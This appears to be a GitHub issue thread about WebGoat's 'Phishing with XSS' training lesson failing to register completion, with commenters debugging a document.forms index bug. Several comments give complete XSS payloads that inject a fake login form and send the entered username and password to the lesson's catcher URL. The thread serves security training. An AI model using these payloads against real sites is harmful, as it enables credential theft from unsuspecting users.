ryancblack/webgoat

Phishing with XSS issue. Can't be resolved

Closed this issue · 7 comments

What steps will reproduce the problem?
1. copy/paste the solution in the search field
2. click login
3. nothing happens

What is the expected output? What do you see instead?
A congratulation message should appear.


What version of the product are you using? On what operating system?
Tested with Iceweasel on Debian and Firefox on MacOS with WebGoat 5.3 


Please provide any additional information below.


Original issue reported on code.google.com by ol.batard@gmail.com on 16 Feb 2010 at 6:48

Here are a few of the things I tried for Phishing w/ XSS.  Neither of the first two
would work when pasted in the box, but they triggered the check-off when in an HTML
page by themselves and the login information was submitted.

    * foo<script>function muahahaha(){ alert("User Name = " + document.forms[0].user.value + "; Password = " + document.forms[0].pass.value); XSSImage=new Image(); XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value;}</script><form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="muahahaha()"></form>
    * bar<form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="var XSSImage=new Image(); XSSImage.src='http://localhost/webgoat/catcher?PROPERTY=yes&user=' + this.form.user.value + '&password=' + this.form.pass.value;"></form>
    * Substituting the variables with their values in the URL
(http://localhost/webgoat/catcher?PROPERTY=yes&user=guest&password=guest) and pasting
that in the box works fine, though that doesn't illustrate the vulnerability.

I tried this on Firefox on Ubuntu.  I isolated the problem to the inability to access
"document.forms[0].user.value" in the lesson page, but it is unclear to me why the
standalone works.  Let me know if you figure this out.

Original comment by Lysand...@gmail.com on 21 Mar 2010 at 7:21

Original comment by mayhe...@gmail.com on 24 Mar 2010 at 8:34

  • Changed state: Accepted

I could fix this by giving my form inputs an Id and accessing them via 
document.getElementById('username') etc.

Original comment by linux.ni...@gmail.com on 9 Jun 2010 at 7:18

I face the same issue. Phishing with XSS doesn't work. I am using Windows 7. If 
I click Hint, Show Params and Show cookies, all three, then it creates an 
additional login form above and that works. Which seems odd. Please fix this.

Original comment by nishikum...@gmail.com on 25 Apr 2011 at 1:22

The problem is with the "document.forms[0].user.value" problem as was mentioned 
above. There is another form before the one that needs to be changed, so 
"forms[0]" targets the wrong one.
Using "document.form.user.value" (the form we want is named "form") works. You 
should also be able to use "document.forms[1].user.value". I've already fixed 
this in the hints and solutions, I just haven't pushed the update yet. I'll 
switch this to "fixed" once I commit the updates.

Original comment by X71...@gmail.com on 4 Aug 2011 at 2:42

  • Changed state: Started
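
The form-index explanation in the 4 Aug 2011 comment, as an added example that is not part of the original thread or WebGoat's code: a simplified model of `document.forms` (a regex scan, not a browser DOM) run over two constructed pages. The first form's name `nav` and the `menu`/`search` field names are assumptions; only the form named `form` and the `user`/`pass` fields come from the thread.

```javascript
// Simplified stand-in for document.forms: every <form>, in document order,
// with its name attribute and the names of the inputs it contains.
function listForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const name = (/\bname\s*=\s*["']?([\w-]+)/i.exec(m[1]) || [])[1] || null;
    const fields = [];
    const inputRe = /<input\b[^>]*?\bname\s*=\s*["']?([\w-]+)/gi;
    let f;
    while ((f = inputRe.exec(m[2])) !== null) fields.push(f[1]);
    forms.push({ name, fields });
  }
  return forms;
}

// A number is a position in document.forms; a string is a form name.
function resolveForm(forms, ref) {
  if (typeof ref === "number") return forms[ref] || null;
  return forms.find((form) => form.name === ref) || null;
}

// True when the referenced form exists and owns an input with that name.
function hasField(forms, ref, field) {
  const form = resolveForm(forms, ref);
  return form !== null && form.fields.includes(field);
}

// Constructed sample: a lesson-style page where another form precedes the
// one named "form" (the name "nav" and field "menu" are hypothetical).
const LESSON_PAGE = `
<form name="nav" action="#"><input type="hidden" name="menu"></form>
<form name="form" action="#">
  <input type="text" name="search">
  <input type="text" name="user"><input type="password" name="pass">
</form>`;

// Constructed sample: the stand-alone test page, which has only one form.
const STANDALONE_PAGE = `
<form><input type="text" name="user"><input type="password" name="pass"></form>`;

for (const ref of [0, 1, "form"]) {
  console.log("lesson page", JSON.stringify(ref), "has user field:",
    hasField(listForms(LESSON_PAGE), ref, "user"));
}
console.log("standalone page 0 has user field:",
  hasField(listForms(STANDALONE_PAGE), 0, "user"));
```

The positional lookup is correct only on the page it was written against; the named lookup, like the `getElementById` approach mentioned earlier in the thread, is unaffected by forms added before it.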

Original comment by mayhe...@gmail.com on 24 Apr 2012 at 11:08

  • Changed state: Fixed

I solved this by inserting my port number 8080 after localhost, like this:
XSSImage.src="http://127.0.0.1:8080/WebGoat/catcher?PROPERTY=yes&user="+ 
document.phish.user.value + "&password=" + document.phish.pass.value + "";

Original comment by Mint...@gmail.com on 5 Jul 2013 at 11:57